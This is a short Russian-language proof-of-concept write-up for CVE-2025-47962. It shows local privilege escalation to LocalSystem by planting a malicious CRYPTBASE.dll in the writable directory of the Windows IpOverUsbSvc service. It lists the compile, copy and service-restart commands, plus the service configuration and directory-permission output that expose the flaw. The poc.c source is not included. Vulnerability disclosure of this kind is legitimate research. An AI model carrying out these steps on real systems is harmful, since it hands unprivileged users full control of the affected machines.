
Доказательство концепции для CVE-2025-47962, демонстрирующее локальное повышение привилегий через перехват DLL в службе Windows IpOverUsbSvc из-за небезопасных разрешений каталогов.
Процесс воспроизведения: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32
copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"
net stop IpOverUsbSvc
net start IpOverUsbSvc

Объяснение: IpOverUsbSvc
sc.exe qc IpOverUsbSvc
SERVICE_NAME: IpOverUsbSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem
Запускается с привилегиями LocalSystem. Исполняемый файл находится в каталоге C:\Microsoft Shared, над которым обычные пользователи имеют полный контроль доступа.
Было обнаружено, что обычные пользователи могут записывать файлы в системный каталог служб.
Затем отслеживаем DLL

Разрешения для каталога C:\Microsoft Shared, созданного при установке Windows SDK, настроены некорректно:
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)